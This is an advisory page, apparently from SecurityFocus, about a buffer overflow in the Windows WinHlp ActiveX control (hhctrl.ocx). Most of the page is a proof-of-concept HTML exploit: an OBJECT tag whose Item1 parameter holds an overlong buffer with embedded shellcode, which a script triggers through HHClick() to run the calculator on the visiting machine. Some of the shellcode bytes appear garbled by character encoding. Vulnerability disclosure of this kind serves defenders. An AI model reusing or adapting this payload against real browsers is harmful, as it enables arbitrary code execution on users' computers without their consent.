Microsoft Windows WinHlp Item Buffer Overflow Vulnerability

The following proof-of-concept code will open the calculator on the client system:

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3�Phcalc^Í4$&#402;�&#1;PV¸¯§éw^?Ð3�P¾&#8221;^Ïéw^?�AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH^Ð&#402;�&#21;^?ægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


 

Privacy Statement
Copyright 2010, SecurityFocus